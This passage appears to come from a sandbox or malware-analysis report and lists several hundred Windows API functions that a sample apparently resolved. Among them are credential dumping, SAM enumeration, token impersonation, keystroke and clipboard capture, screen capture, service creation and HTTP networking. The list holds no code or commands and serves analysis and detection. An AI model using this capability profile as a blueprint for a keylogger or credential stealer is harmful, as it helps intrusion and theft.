  1526. "netutils.dll.NetApiBufferFree",
  1527. "kernel32.dll.SetThreadUILanguage",
  1528. "kernel32.dll.CopyFileExW",
  1529. "kernel32.dll.SetConsoleInputExeNameW",
  1530. "rpcrt4.dll.I_RpcSNCHOption",
  1531. "sechost.dll.OpenSCManagerW",
  1532. "sechost.dll.OpenServiceW",
  1533. "sechost.dll.CloseServiceHandle",
  1534. "sechost.dll.ControlService",
  1535. "sechost.dll.QueryServiceStatus",
  1536. "sechost.dll.StartServiceW",
  1537. "secur32.dll.GetUserNameExW",
  1538. "secur32.dll.InitializeSecurityContextW",
  1539. "secur32.dll.FreeCredentialsHandle",
  1540. "secur32.dll.AcquireCredentialsHandleW",
  1541. "secur32.dll.QuerySecurityPackageInfoW",
  1542. "secur32.dll.CompleteAuthToken",
  1543. "secur32.dll.FreeContextBuffer",
  1544. "secur32.dll.GetUserNameExA",
  1545. "winscard.dll.SCardEstablishContext",
  1546. "winscard.dll.SCardReleaseContext",
  1547. "winscard.dll.SCardGetStatusChangeW",
  1548. "winscard.dll.SCardListReadersW",
  1549. "ws2_32.dll.#151",
  1550. "ws2_32.dll.freeaddrinfo",
  1551. "ws2_32.dll.#21",
  1552. "ws2_32.dll.#19",
  1553. "ws2_32.dll.#16",
  1554. "ws2_32.dll.#10",
  1555. "ws2_32.dll.#111",
  1556. "ws2_32.dll.#116",
  1557. "ws2_32.dll.#115",
  1558. "ws2_32.dll.WSAIoctl",
  1559. "ws2_32.dll.#4",
  1560. "ws2_32.dll.#23",
  1561. "ws2_32.dll.#11",
  1562. "ws2_32.dll.#3",
  1563. "ws2_32.dll.#18",
  1564. "ws2_32.dll.getaddrinfo",
  1565. "ws2_32.dll.#9",
  1566. "userenv.dll.CreateEnvironmentBlock",
  1567. "userenv.dll.DestroyEnvironmentBlock",
  1568. "dbghelp.dll.MiniDumpWriteDump",
  1569. "wtsapi32.dll.WTSEnumerateSessionsW",
  1570. "ole32.dll.CoSetProxyBlanket",
  1571. "kernel32.dll.InitializeCriticalSection",
  1572. "kernel32.dll.TryEnterCriticalSection",
  1573. "kernel32.dll.SizeofResource",
  1574. "kernel32.dll.InitAtomTable",
  1575. "kernel32.dll.SetHandleCount",
  1576. "kernel32.dll.LoadModule",
  1577. "kernel32.dll.ClearCommError",
  1578. "kernel32.dll.GetCommConfig",
  1579. "kernel32.dll.GetCommMask",
  1580. "kernel32.dll.TransmitCommChar",
  1581. "kernel32.dll.GetTapeParameters",
  1582. "kernel32.dll.MulDiv",
  1583. "kernel32.dll.GetSystemTime",
  1584. "kernel32.dll.GetTimeZoneInformation",
  1585. "kernel32.dll.FileTimeToSystemTime",
  1586. "kernel32.dll.CompareFileTime",
  1587. "kernel32.dll.DosDateTimeToFileTime",
  1588. "kernel32.dll.GetTickCount",
  1589. "kernel32.dll.GetNamedPipeInfo",
  1590. "kernel32.dll.UnmapViewOfFile",
  1591. "kernel32.dll.lstrcmpiA",
  1592. "kernel32.dll.lstrcpyW",
  1593. "kernel32.dll.lstrcatW",
  1594. "kernel32.dll.lstrlenW",
  1595. "kernel32.dll._lcreat",
  1596. "kernel32.dll.CreateMutexA",
  1597. "kernel32.dll.CreateMutexW",
  1598. "kernel32.dll.CreateEventA",
  1599. "kernel32.dll.CreateEventW",
  1600. "kernel32.dll.OpenSemaphoreW",
  1601. "kernel32.dll.OpenWaitableTimerW",
  1602. "kernel32.dll.CancelWaitableTimer",
  1603. "kernel32.dll.LoadLibraryW",
  1604. "kernel32.dll.GetStartupInfoA",
  1605. "kernel32.dll.FindResourceA",
  1606. "kernel32.dll.GetProfileIntW",
  1607. "kernel32.dll.WriteProfileStringW",
  1608. "kernel32.dll.GetPrivateProfileIntW",
  1609. "kernel32.dll.GetPrivateProfileStringW",
  1610. "kernel32.dll.GetPrivateProfileSectionW",
  1611. "kernel32.dll.GetDriveTypeA",
  1612. "kernel32.dll.GetDriveTypeW",
  1613. "kernel32.dll.GetSystemDirectoryA",
  1614. "kernel32.dll.GetSystemDirectoryW",
  1615. "kernel32.dll.GetTempFileNameA",
  1616. "kernel32.dll.GetSystemWindowsDirectoryA",
  1617. "kernel32.dll.GetCurrentDirectoryA",
  1618. "kernel32.dll.GetDllDirectoryA",
  1619. "kernel32.dll.GetDllDirectoryW",
  1620. "kernel32.dll.GetDiskFreeSpaceA",
  1621. "kernel32.dll.RemoveDirectoryW",
  1622. "kernel32.dll.GetFullPathNameA",
  1623. "kernel32.dll.DefineDosDeviceW",
  1624. "kernel32.dll.GetFileAttributesA",
  1625. "kernel32.dll.GetFileAttributesW",
  1626. "kernel32.dll.GetFileAttributesExA",
  1627. "kernel32.dll.FindFirstFileA",
  1628. "kernel32.dll.SearchPathA",
  1629. "kernel32.dll.SearchPathW",
  1630. "kernel32.dll.CheckRemoteDebuggerPresent",
  1631. "kernel32.dll.ReplaceFileW",
  1632. "kernel32.dll.CreateNamedPipeA",
  1633. "kernel32.dll.FindCloseChangeNotification",
  1634. "kernel32.dll.GetDefaultCommConfigA",
  1635. "kernel32.dll.GetComputerNameExA",
  1636. "kernel32.dll.GetComputerNameExW",
  1637. "kernel32.dll.CancelTimerQueueTimer",
  1638. "kernel32.dll.VerifyVersionInfoW",
  1639. "kernel32.dll.OpenJobObjectA",
  1640. "kernel32.dll.DeleteVolumeMountPointA",
  1641. "kernel32.dll.DeleteVolumeMountPointW",
  1642. "kernel32.dll.GetVolumeNameForVolumeMountPointW",
  1643. "kernel32.dll.GetVolumePathNamesForVolumeNameA",
  1644. "kernel32.dll.GetCurrentActCtx",
  1645. "kernel32.dll.FindActCtxSectionGuid",
  1646. "kernel32.dll.CompareStringA",
  1647. "kernel32.dll.CompareStringW",
  1648. "kernel32.dll.GetCalendarInfoA",
  1649. "kernel32.dll.GetTimeFormatW",
  1650. "kernel32.dll.IsValidLocale",
  1651. "kernel32.dll.GetGeoInfoA",
  1652. "kernel32.dll.GetThreadLocale",
  1653. "kernel32.dll.GetUserDefaultLCID",
  1654. "kernel32.dll.WriteConsoleOutputCharacterW",
  1655. "kernel32.dll.FillConsoleOutputCharacterW",
  1656. "kernel32.dll.GetConsoleFontSize",
  1657. "kernel32.dll.SetConsoleCtrlHandler",
  1658. "kernel32.dll.DebugBreakProcess",
  1659. "kernel32.dll.WaitNamedPipeW",
  1660. "kernel32.dll.GetExitCodeProcess",
  1661. "kernel32.dll.lstrcmpiW",
  1662. "kernel32.dll.GetModuleFileNameW",
  1663. "kernel32.dll.LockResource",
  1664. "kernel32.dll.LoadResource",
  1665. "kernel32.dll.FindResourceW",
  1666. "kernel32.dll.SetHandleInformation",
  1667. "kernel32.dll.ExpandEnvironmentStringsW",
  1668. "kernel32.dll.PeekNamedPipe",
  1669. "kernel32.dll.GetTimeFormatA",
  1670. "kernel32.dll.FreeResource",
  1671. "kernel32.dll.GetDateFormatA",
  1672. "kernel32.dll.MoveFileExW",
  1673. "kernel32.dll.CreateProcessW",
  1674. "kernel32.dll.GlobalLock",
  1675. "kernel32.dll.InterlockedIncrement",
  1676. "kernel32.dll.CreateDirectoryW",
  1677. "kernel32.dll.DeleteFileW",
  1678. "kernel32.dll.MoveFileW",
  1679. "kernel32.dll.CreateToolhelp32Snapshot",
  1680. "kernel32.dll.Process32NextW",
  1681. "kernel32.dll.Process32FirstW",
  1682. "kernel32.dll.lstrcmpW",
  1683. "kernel32.dll.SetFileTime",
  1684. "kernel32.dll.ProcessIdToSessionId",
  1685. "kernel32.dll.SleepEx",
  1686. "kernel32.dll.GetFileTime",
  1687. "kernel32.dll.GetLogicalDrives",
  1688. "kernel32.dll.FindFirstFileW",
  1689. "kernel32.dll.FindNextFileW",
  1690. "kernel32.dll.SetFileAttributesW",
  1691. "kernel32.dll.QueryPerformanceFrequency",
  1692. "kernel32.dll.OpenEventW",
  1693. "kernel32.dll.SetEvent",
  1694. "kernel32.dll.LocalAlloc",
  1695. "kernel32.dll.GetComputerNameW",
  1696. "kernel32.dll.GetComputerNameA",
  1697. "kernel32.dll.SetThreadPriority",
  1698. "kernel32.dll.ResumeThread",
  1699. "kernel32.dll.CreateSemaphoreW",
  1700. "kernel32.dll.QueueUserAPC",
  1701. "kernel32.dll.GetQueuedCompletionStatus",
  1702. "kernel32.dll.GetThreadSelectorEntry",
  1703. "kernel32.dll.TerminateThread",
  1704. "kernel32.dll.GetThreadIOPendingFlag",
  1705. "kernel32.dll.RequestWakeupLatency",
  1706. "kernel32.dll.CreateThread",
  1707. "kernel32.dll.ConvertFiberToThread",
  1708. "kernel32.dll.FreeEnvironmentStringsA",
  1709. "kernel32.dll.GetBinaryTypeA",
  1710. "kernel32.dll.VirtualQueryEx",
  1711. "kernel32.dll.LocalSize",
  1712. "kernel32.dll.LocalReAlloc",
  1713. "kernel32.dll.GlobalMemoryStatus",
  1714. "kernel32.dll.GlobalUnlock",
  1715. "kernel32.dll.GlobalSize",
  1716. "kernel32.dll.GlobalReAlloc",
  1717. "kernel32.dll.GetVersion",
  1718. "kernel32.dll.RtlCaptureContext",
  1719. "kernel32.dll.DebugActiveProcessStop",
  1720. "kernel32.dll.WaitForDebugEvent",
  1721. "kernel32.dll.GetLocaleInfoW",
  1722. "kernel32.dll.WaitForSingleObjectEx",
  1723. "kernel32.dll.FreeLibraryAndExitThread",
  1724. "kernel32.dll.EnumSystemLocalesW",
  1725. "kernel32.dll.ReadConsoleW",
  1726. "kernel32.dll.SetEnvironmentVariableA",
  1727. "kernel32.dll.CopyFileExA",
  1728. "kernel32.dll.GetSystemInfo",
  1729. "user32.dll.GetThreadDesktop",
  1730. "user32.dll.SendMessageW",
  1731. "user32.dll.GetIconInfo",
  1732. "user32.dll.GetClipboardOwner",
  1733. "user32.dll.SetClipboardViewer",
  1734. "user32.dll.EqualRect",
  1735. "user32.dll.GetWindowRect",
  1736. "user32.dll.GetWindowLongW",
  1737. "user32.dll.OpenDesktopW",
  1738. "user32.dll.FindWindowW",
  1739. "user32.dll.PostMessageW",
  1740. "user32.dll.GetDC",
  1741. "user32.dll.IntersectRect",
  1742. "user32.dll.EnumWindows",
  1743. "user32.dll.IsWindowVisible",
  1744. "user32.dll.SetTimer",
  1745. "user32.dll.PostThreadMessageW",
  1746. "user32.dll.SetWinEventHook",
  1747. "user32.dll.SystemParametersInfoW",
  1748. "user32.dll.WinHelpW",
  1749. "user32.dll.TranslateMDISysAccel",
  1750. "user32.dll.DefFrameProcW",
  1751. "user32.dll.IsDialogMessageW",
  1752. "user32.dll.LoadStringW",
  1753. "user32.dll.LoadStringA",
  1754. "user32.dll.DestroyIcon",
  1755. "user32.dll.LoadIconA",
  1756. "user32.dll.DestroyCursor",
  1757. "user32.dll.GetWindowThreadProcessId",
  1758. "user32.dll.FindWindowA",
  1759. "user32.dll.IsRectEmpty",
  1760. "user32.dll.InflateRect",
  1761. "user32.dll.GetSysColorBrush",
  1762. "user32.dll.HideCaret",
  1763. "user32.dll.GetCaretBlinkTime",
  1764. "user32.dll.SetCursor",
  1765. "user32.dll.SetWindowTextA",
  1766. "user32.dll.GetScrollPos",
  1767. "user32.dll.SetScrollPos",
  1768. "user32.dll.GetUserObjectInformationW",
  1769. "user32.dll.EndPaint",
  1770. "user32.dll.CloseDesktop",
  1771. "user32.dll.SetActiveWindow",
  1772. "user32.dll.UpdateWindow",
  1773. "user32.dll.DrawTextW",
  1774. "user32.dll.DrawTextA",
  1775. "user32.dll.GetSubMenu",
  1776. "user32.dll.EnableMenuItem",
  1777. "user32.dll.DestroyMenu",
  1778. "user32.dll.GetSystemMenu",
  1779. "user32.dll.GetMenuState",
  1780. "user32.dll.SetMenu",
  1781. "user32.dll.LoadMenuIndirectW",
  1782. "user32.dll.TranslateAcceleratorA",
  1783. "user32.dll.IsWindowEnabled",
  1784. "user32.dll.EnableWindow",
  1785. "user32.dll.MsgWaitForMultipleObjects",
  1786. "user32.dll.SetFocus",
  1787. "user32.dll.IsCharUpperW",
  1788. "user32.dll.CharNextA",
  1789. "user32.dll.CharUpperW",
  1790. "user32.dll.CharUpperA",
  1791. "user32.dll.IsDlgButtonChecked",
  1792. "user32.dll.GetDlgItemTextW",
  1793. "user32.dll.GetDlgItemTextA",
  1794. "user32.dll.GetDlgItem",
  1795. "user32.dll.DialogBoxParamW",
  1796. "user32.dll.CreateDialogParamW",
  1797. "user32.dll.CreateDialogParamA",
  1798. "user32.dll.IsZoomed",
  1799. "user32.dll.AnyPopup",
  1800. "user32.dll.BeginDeferWindowPos",
  1801. "user32.dll.IsWindow",
  1802. "user32.dll.InSendMessage",
  1803. "user32.dll.CallWindowProcW",
  1804. "user32.dll.DefWindowProcW",
  1805. "user32.dll.DefWindowProcA",
  1806. "user32.dll.AttachThreadInput",
  1807. "user32.dll.SendMessageA",
  1808. "user32.dll.PeekMessageW",
  1809. "user32.dll.PeekMessageA",
  1810. "user32.dll.GetMessageA",
  1811. "user32.dll.SetWindowLongW",
  1812. "user32.dll.PostQuitMessage",
  1813. "user32.dll.GetCursorPos",
  1814. "user32.dll.VkKeyScanExW",
  1815. "user32.dll.MapVirtualKeyW",
  1816. "user32.dll.GetAsyncKeyState",
  1817. "user32.dll.OpenClipboard",
  1818. "user32.dll.DispatchMessageW",
  1819. "user32.dll.GetCursorInfo",
  1820. "user32.dll.ChangeClipboardChain",
  1821. "user32.dll.CloseClipboard",
  1822. "user32.dll.EmptyClipboard",
  1823. "user32.dll.OpenInputDesktop",
  1824. "user32.dll.ReleaseDC",
  1825. "user32.dll.SetClipboardData",
  1826. "user32.dll.LoadKeyboardLayoutW",
  1827. "user32.dll.SendMessageTimeoutW",
  1828. "user32.dll.keybd_event",
  1829. "user32.dll.GetSystemMetrics",
  1830. "user32.dll.SetThreadDesktop",
  1831. "user32.dll.GetKeyboardState",
  1832. "user32.dll.ExitWindowsEx",
  1833. "user32.dll.mouse_event",
  1834. "user32.dll.MessageBoxA",
  1835. "user32.dll.DestroyWindow",
  1836. "user32.dll.CreateWindowExW",
  1837. "user32.dll.RegisterClassExW",
  1838. "user32.dll.ScrollDC",
  1839. "user32.dll.GetMessageW",
  1840. "gdi32.dll.GdiFlush",
  1841. "gdi32.dll.SelectObject",
  1842. "gdi32.dll.CreateCompatibleBitmap",
  1843. "gdi32.dll.BitBlt",
  1844. "gdi32.dll.CreateDIBSection",
  1845. "gdi32.dll.CreateCompatibleDC",
  1846. "gdi32.dll.RealizePalette",
  1847. "gdi32.dll.GetDIBits",
  1848. "gdi32.dll.GetDeviceCaps",
  1849. "gdi32.dll.GetSystemPaletteEntries",
  1850. "gdi32.dll.DeleteDC",
  1851. "gdi32.dll.CreatePalette",
  1852. "gdi32.dll.CreateRectRgnIndirect",
  1853. "gdi32.dll.GetRegionData",
  1854. "gdi32.dll.CombineRgn",
  1855. "gdi32.dll.GetBitmapBits",
  1856. "gdi32.dll.GetObjectW",
  1857. "gdi32.dll.DeleteObject",
  1858. "gdi32.dll.LPtoDP",
  1859. "gdi32.dll.ExtTextOutA",
  1860. "gdi32.dll.SetAbortProc",
  1861. "gdi32.dll.StartPage",
  1862. "gdi32.dll.StartDocW",
  1863. "gdi32.dll.UpdateColors",
  1864. "gdi32.dll.StretchBlt",
  1865. "gdi32.dll.SelectPalette",
  1866. "gdi32.dll.GetPaletteEntries",
  1867. "gdi32.dll.GetMetaFileW",
  1868. "gdi32.dll.Escape",
  1869. "gdi32.dll.EqualRgn",
  1870. "gdi32.dll.Ellipse",
  1871. "gdi32.dll.CreateRectRgn",
  1872. "gdi32.dll.CreateFontIndirectA",
  1873. "comdlg32.dll.GetSaveFileNameW",
  1874. "comdlg32.dll.GetSaveFileNameA",
  1875. "comdlg32.dll.GetOpenFileNameW",
  1876. "comdlg32.dll.ReplaceTextW",
  1877. "comdlg32.dll.FindTextW",
  1878. "comdlg32.dll.FindTextA",
  1879. "comdlg32.dll.GetFileTitleW",
  1880. "advapi32.dll.RegCreateKeyExA",
  1881. "advapi32.dll.DeleteService",
  1882. "advapi32.dll.ControlService",
  1883. "advapi32.dll.StartServiceW",
  1884. "advapi32.dll.EnumServicesStatusExW",
  1885. "advapi32.dll.QueryServiceConfigW",
  1886. "advapi32.dll.OpenServiceW",
  1887. "advapi32.dll.ConvertSidToStringSidW",
  1888. "advapi32.dll.GetTokenInformation",
  1889. "advapi32.dll.RegisterServiceCtrlHandlerExW",
  1890. "advapi32.dll.SetTokenInformation",
  1891. "advapi32.dll.SetServiceStatus",
  1892. "advapi32.dll.CreateProcessAsUserW",
  1893. "advapi32.dll.StartServiceCtrlDispatcherW",
  1894. "advapi32.dll.DuplicateTokenEx",
  1895. "advapi32.dll.RegSetValueExA",
  1896. "advapi32.dll.RegQueryValueExA",
  1897. "advapi32.dll.OpenSCManagerA",
  1898. "advapi32.dll.RegRestoreKeyW",
  1899. "advapi32.dll.RegOpenKeyExA",
  1900. "advapi32.dll.RegOpenKeyA",
  1901. "advapi32.dll.RegNotifyChangeKeyValue",
  1902. "advapi32.dll.RegDeleteValueW",
  1903. "advapi32.dll.RegCreateKeyA",
  1904. "advapi32.dll.OpenProcessToken",
  1905. "advapi32.dll.CloseServiceHandle",
  1906. "advapi32.dll.QueryServiceStatus",
  1907. "advapi32.dll.CreateServiceW",
  1908. "advapi32.dll.InitiateSystemShutdownExW",
  1909. "advapi32.dll.AdjustTokenPrivileges",
  1910. "advapi32.dll.LookupPrivilegeValueW",
  1911. "advapi32.dll.AccessCheck",
  1912. "advapi32.dll.SetSecurityDescriptorOwner",
  1913. "advapi32.dll.AllocateAndInitializeSid",
  1914. "advapi32.dll.GetSidSubAuthority",
  1915. "advapi32.dll.IsValidSecurityDescriptor",
  1916. "advapi32.dll.FreeSid",
  1917. "advapi32.dll.InitializeAcl",
  1918. "advapi32.dll.DuplicateToken",
  1919. "advapi32.dll.GetLengthSid",
  1920. "advapi32.dll.AddAccessAllowedAce",
  1921. "advapi32.dll.SetSecurityDescriptorGroup",
  1922. "advapi32.dll.RegDeleteKeyA",
  1923. "advapi32.dll.OpenSCManagerW",
  1924. "advapi32.dll.RegCreateKeyExW",
  1925. "advapi32.dll.RegEnumKeyExW",
  1926. "advapi32.dll.ImpersonateLoggedOnUser",
  1927. "advapi32.dll.RevertToSelf",
  1928. "advapi32.dll.RegQueryValueExW",
  1929. "shell32.dll.SHGetSpecialFolderPathW",
  1930. "shell32.dll.ShellExecuteW",
  1931. "shell32.dll.ShellAboutW",
  1932. "kernel32.dll.FlsFree",
  1933. "kernel32.dll.InitOnceExecuteOnce",
  1934. "kernel32.dll.CreateEventExW",
  1935. "kernel32.dll.CreateSemaphoreExW",
  1936. "kernel32.dll.CreateThreadpoolTimer",
  1937. "kernel32.dll.SetThreadpoolTimer",
  1938. "kernel32.dll.WaitForThreadpoolTimerCallbacks",
  1939. "kernel32.dll.CloseThreadpoolTimer",
  1940. "kernel32.dll.CreateThreadpoolWait",
  1941. "kernel32.dll.SetThreadpoolWait",
  1942. "kernel32.dll.CloseThreadpoolWait",
  1943. "kernel32.dll.FlushProcessWriteBuffers",
  1944. "kernel32.dll.FreeLibraryWhenCallbackReturns",
  1945. "kernel32.dll.GetCurrentProcessorNumber",
  1946. "kernel32.dll.CreateSymbolicLinkW",
  1947. "kernel32.dll.GetTickCount64",
  1948. "kernel32.dll.GetFileInformationByHandleEx",
  1949. "kernel32.dll.SetFileInformationByHandle",
  1950. "kernel32.dll.InitializeConditionVariable",
  1951. "kernel32.dll.WakeConditionVariable",
  1952. "kernel32.dll.WakeAllConditionVariable",
  1953. "kernel32.dll.SleepConditionVariableCS",
  1954. "kernel32.dll.TryAcquireSRWLockExclusive",
  1955. "kernel32.dll.SleepConditionVariableSRW",
  1956. "kernel32.dll.CreateThreadpoolWork",
  1957. "kernel32.dll.SubmitThreadpoolWork",
  1958. "kernel32.dll.CloseThreadpoolWork",
  1959. "kernel32.dll.CompareStringEx",
  1960. "kernel32.dll.GetLocaleInfoEx",
  1961. "api-ms-win-core-synch-l1-2-0.dll.InitializeConditionVariable",
  1962. "api-ms-win-core-synch-l1-2-0.dll.SleepConditionVariableCS",
  1963. "api-ms-win-core-synch-l1-2-0.dll.WakeAllConditionVariable",
  1964. "kernel32.dll.WTSGetActiveConsoleSessionId",
  1965. "ntdll.dll.RtlGetVersion",
  1966. "dwmapi.dll.DwmIsCompositionEnabled",
  1967. "kbdus.dll.#1",
  1968. "kernel32.dll.GetNativeSystemInfo",
  1969. "sechost.dll.LookupAccountNameLocalW",
  1970. "advapi32.dll.LookupAccountSidW",
  1971. "sechost.dll.LookupAccountSidLocalW",
  1972. "kernel32.dll.GetThreadPreferredUILanguages",
  1973. "kernel32.dll.SetThreadPreferredUILanguages",
  1974. "kernel32.dll.LocaleNameToLCID",
  1975. "kernel32.dll.LCIDToLocaleName",
  1976. "kernel32.dll.GetSystemDefaultLocaleName",
  1977. "oleaut32.dll.#283",
  1978. "oleaut32.dll.#284",
  1979. "kernel32.dll.RegOpenKeyExW",
  1980. "ntdll.dll.EtwUnregisterTraceGuids",
  1981. "sechost.dll.QueryServiceConfigW",
  1982. "winsta.dll.WinStationRegisterNotificationEvent",
  1983. "advapi32.dll.CreateWellKnownSid",
  1984. "rpcrt4.dll.RpcStringBindingComposeW",
  1985. "rpcrt4.dll.RpcBindingFromStringBindingW",
  1986. "rpcrt4.dll.RpcStringFreeW",
  1987. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
  1988. "rpcrt4.dll.RpcAsyncInitializeHandle",
  1989. "rpcrt4.dll.NdrClientCall2",
  1990. "rpcrt4.dll.NdrAsyncClientCall",
  1991. "winsta.dll.WinStationIsSessionRemoteable",
  1992. "wtsapi32.dll.WTSQuerySessionInformationW",
  1993. "winsta.dll.WinStationQueryInformationW",
  1994. "rpcrt4.dll.I_RpcExceptionFilter",
  1995. "wtsapi32.dll.WTSFreeMemory",
  1996. "wmisvc.dll.ServiceMain",
  1997. "sechost.dll.RegisterServiceCtrlHandlerExW",
  1998. "sechost.dll.SetServiceStatus",
  1999. "cryptsp.dll.CryptAcquireContextW",
  2000. "cryptsp.dll.CryptGenRandom",
  2001. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
  2002. "advapi32.dll.RegisterEventSourceW",
  2003. "advapi32.dll.ReportEventW",
  2004. "advapi32.dll.DeregisterEventSource",
  2005. "advapi32.dll.WmiOpenBlock",
  2006. "ole32.dll.CoGetClassObject",
  2007. "ole32.dll.CoGetMarshalSizeMax",
  2008. "ole32.dll.CoMarshalInterface",
  2009. "ole32.dll.CoUnmarshalInterface",
  2010. "ole32.dll.StringFromIID",
  2011. "ole32.dll.CoGetPSClsid",
  2012. "ole32.dll.CoReleaseMarshalData",
  2013. "ole32.dll.DcomChannelSetHResult",
  2014. "vssapi.dll.CreateWriter",
  2015. "advapi32.dll.LookupAccountNameW",
  2016. "samcli.dll.NetLocalGroupGetMembers",
  2017. "samlib.dll.SamConnect",
  2018. "rpcrt4.dll.NdrClientCall3",
  2019. "samlib.dll.SamOpenDomain",
  2020. "samlib.dll.SamLookupNamesInDomain",
  2021. "samlib.dll.SamOpenAlias",
  2022. "samlib.dll.SamFreeMemory",
  2023. "samlib.dll.SamCloseHandle",
  2024. "samlib.dll.SamGetMembersInAlias",
  2025. "samlib.dll.SamEnumerateDomainsInSamServer",
  2026. "samlib.dll.SamLookupDomainInSamServer",
  2027. "ole32.dll.StringFromCLSID",
  2028. "oleaut32.dll.#4",
  2029. "oleaut32.dll.#7",
  2030. "propsys.dll.VariantToPropVariant",
  2031. "wbemcore.dll.Reinitialize",
  2032. "wbemsvc.dll.DllGetClassObject",
  2033. "wbemsvc.dll.DllCanUnloadNow",
  2034. "authz.dll.AuthzInitializeContextFromToken",
  2035. "authz.dll.AuthzInitializeObjectAccessAuditEvent2",
  2036. "authz.dll.AuthzAccessCheck",
  2037. "authz.dll.AuthzFreeAuditEvent",
  2038. "authz.dll.AuthzFreeContext",
  2039. "authz.dll.AuthzInitializeResourceManager",
  2040. "authz.dll.AuthzFreeResourceManager",
  2041. "rpcrt4.dll.RpcBindingCreateW",
  2042. "rpcrt4.dll.RpcBindingBind",
  2043. "rpcrt4.dll.I_RpcMapWin32Status",
  2044. "advapi32.dll.EventRegister",
  2045. "advapi32.dll.EventUnregister",
  2046. "advapi32.dll.EventWrite",
  2047. "kernel32.dll.RegCloseKey",
  2048. "kernel32.dll.RegSetValueExW",
  2049. "kernel32.dll.RegQueryValueExW",
  2050. "wmisvc.dll.IsImproperShutdownDetected",
  2051. "wevtapi.dll.EvtRender",
  2052. "wevtapi.dll.EvtNext",
  2053. "wevtapi.dll.EvtClose",
  2054. "wevtapi.dll.EvtQuery",
  2055. "wevtapi.dll.EvtCreateRenderContext",
  2056. "rpcrt4.dll.RpcBindingSetOption",
  2057. "ole32.dll.CoCreateFreeThreadedMarshaler",
  2058. "ole32.dll.CreateStreamOnHGlobal",
  2059. "cryptsp.dll.CryptReleaseContext",
  2060. "kernelbase.dll.InitializeAcl",
  2061. "kernelbase.dll.AddAce",
  2062. "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
  2063. "kernel32.dll.IsThreadAFiber",
  2064. "kernel32.dll.OpenProcessToken",
  2065. "kernelbase.dll.GetTokenInformation",
  2066. "kernelbase.dll.DuplicateTokenEx",
  2067. "kernelbase.dll.AdjustTokenPrivileges",
  2068. "kernel32.dll.SetThreadToken",
  2069. "kernelbase.dll.CheckTokenMembership",
  2070. "ole32.dll.CLSIDFromString",
  2071. "kernelbase.dll.AllocateAndInitializeSid",
  2072. "oleaut32.dll.#285",
  2073. "oleaut32.dll.#286",
  2074. "oleaut32.dll.#17",
  2075. "oleaut32.dll.#20",
  2076. "oleaut32.dll.#19",
  2077. "oleaut32.dll.#25",
  2078. "authz.dll.AuthzInitializeContextFromSid",
  2079. "ole32.dll.CoGetCallContext",
  2080. "ole32.dll.CoImpersonateClient",
  2081. "ole32.dll.CoRevertToSelf",
  2082. "ole32.dll.CoSwitchCallContext",
  2083. "lpk.dll.LpkEditControl",
  2084. "comctl32.dll.InitCommonControlsEx",
  2085. "kernel32.dll.HeapSetInformation",
  2086. "advapi32.dll.CheckTokenMembership",
  2087. "kernel32.dll.GetSystemWindowsDirectoryW",
  2088. "kernel32.dll.CreateWaitableTimerW",
  2089. "kernel32.dll.SetWaitableTimer",
  2090. "ole32.dll.CLSIDFromOle1Class",
  2091. "clbcatq.dll.GetCatalogObject",
  2092. "clbcatq.dll.GetCatalogObject2",
  2093. "ole32.dll.NdrOleInitializeExtension",
  2094. "msi.dll.QueryInstanceCount",
  2095. "msi.dll.DllGetClassObject",
  2096. "msi.dll.DllCanUnloadNow",
  2097. "rpcrt4.dll.I_RpcBindingInqLocalClientPID",
  2098. "ntdll.dll.WinSqmIsOptedIn",
  2099. "netapi32.dll.NetGetJoinInformation",
  2100. "netapi32.dll.NetApiBufferFree",
  2101. "shlwapi.dll.UrlIsW",
  2102. "ole32.dll.StgOpenStorage",
  2103. "kernel32.dll.GetFileAttributesExW",
  2104. "advapi32.dll.SaferCreateLevel",
  2105. "advapi32.dll.SaferCloseLevel",
  2106. "apphelp.dll.SdbInitDatabase",
  2107. "apphelp.dll.SdbFindFirstMsiPackage_Str",
  2108. "apphelp.dll.SdbReleaseDatabase",
  2109. "version.dll.GetFileVersionInfoSizeW",
  2110. "version.dll.GetFileVersionInfoW",
  2111. "version.dll.VerQueryValueW",
  2112. "mscoree.dll.GetCORSystemDirectory",
  2113. "advapi32.dll.RegQueryInfoKeyW",
  2114. "advapi32.dll.RegEnumValueW",
  2115. "kernel32.dll.SetThreadExecutionState",
  2116. "sfc.dll.SfcIsKeyProtected",
  2117. "goopdate.dll.DllEntry",
  2118. "kernel32.dll.RtlCaptureStackBackTrace",
  2119. "wkscli.dll.NetWkstaGetInfo",
  2120. "kernel32.dll.CreateMutexExW",
  2121. "rpcrt4.dll.UuidCreate",
  2122. "psmachine.dll.DllGetClassObject",
  2123. "psmachine.dll.DllCanUnloadNow",
  2124. "winhttp.dll.WinHttpAddRequestHeaders",
  2125. "winhttp.dll.WinHttpCheckPlatform",
  2126. "winhttp.dll.WinHttpCloseHandle",
  2127. "winhttp.dll.WinHttpConnect",
  2128. "winhttp.dll.WinHttpCrackUrl",
  2129. "winhttp.dll.WinHttpCreateUrl",
  2130. "winhttp.dll.WinHttpDetectAutoProxyConfigUrl",
  2131. "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
  2132. "winhttp.dll.WinHttpGetDefaultProxyConfiguration",
  2133. "winhttp.dll.WinHttpGetProxyForUrl",
  2134. "winhttp.dll.WinHttpOpen",
  2135. "winhttp.dll.WinHttpOpenRequest",
  2136. "winhttp.dll.WinHttpQueryAuthSchemes",
  2137. "winhttp.dll.WinHttpQueryDataAvailable",
  2138. "winhttp.dll.WinHttpQueryHeaders",
  2139. "winhttp.dll.WinHttpQueryOption",
  2140. "winhttp.dll.WinHttpReadData",
  2141. "winhttp.dll.WinHttpReceiveResponse",
  2142. "winhttp.dll.WinHttpSendRequest",
  2143. "winhttp.dll.WinHttpSetDefaultProxyConfiguration",
  2144. "winhttp.dll.WinHttpSetCredentials",
  2145. "winhttp.dll.WinHttpSetOption",
  2146. "winhttp.dll.WinHttpSetStatusCallback",
  2147. "winhttp.dll.WinHttpSetTimeouts",
  2148. "winhttp.dll.WinHttpWriteData",
  2149. "shlwapi.dll.StrCmpNW",
  2150. "shlwapi.dll.#153",
  2151. "ws2_32.dll.GetAddrInfoW",
  2152. "ws2_32.dll.WSASocketW",
  2153. "ws2_32.dll.#2",
  2154. "ws2_32.dll.FreeAddrInfoW",
  2155. "ws2_32.dll.#6",
  2156. "ws2_32.dll.#5",
  2157. "schannel.dll.SpUserModeInitialize",
  2158. "ws2_32.dll.WSASend",
